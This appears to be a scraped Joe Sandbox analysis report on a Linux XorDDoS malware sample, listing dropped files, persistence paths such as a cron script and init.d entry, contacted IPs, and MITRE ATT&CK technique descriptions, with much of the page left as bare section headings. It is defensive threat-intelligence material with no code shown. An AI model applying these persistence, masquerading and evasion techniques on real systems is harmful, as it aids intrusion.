Source: /usr/bin/sotpizdssr	Joe Sandbox ML: detected
Source: /usr/bin/kigdktzeum	Joe Sandbox ML: detected
Source: /usr/bin/ibkljkndlm	Joe Sandbox ML: detected
Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/wvbxepjyjx	Joe Sandbox ML: detected
Source: /usr/bin/eqznayducj	Joe Sandbox ML: detected
Source: /usr/bin/qrabekbstr	Joe Sandbox ML: detected
Source: /usr/bin/mizdkrdyqj	Joe Sandbox ML: detected
Source: /usr/bin/iulapzbfpq	Joe Sandbox ML: detected
Source: /usr/bin/gnmftoxpza	Joe Sandbox ML: detected
Source: /usr/bin/becqudbgme	Joe Sandbox ML: detected
Source: /usr/bin/buxftyvhwp	Joe Sandbox ML: detected

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report HaJTqGiPpD

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/HaJTqGiPpD

/memfd:snapd-env-generator (deleted)

/run/gcc.pid

/usr/bin/becqudbgme

/usr/bin/buxftyvhwp

/usr/bin/eqznayducj

/usr/bin/gnmftoxpza

/usr/bin/ibkljkndlm

/usr/bin/iulapzbfpq

/usr/bin/kigdktzeum

/usr/bin/mizdkrdyqj

/usr/bin/posifzmmhg

/usr/bin/qrabekbstr

/usr/bin/sotpizdssr

/usr/bin/sxruomujjd

/usr/bin/wvbxepjyjx

/usr/lib/libudev.so

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Linux Analysis Report
HaJTqGiPpD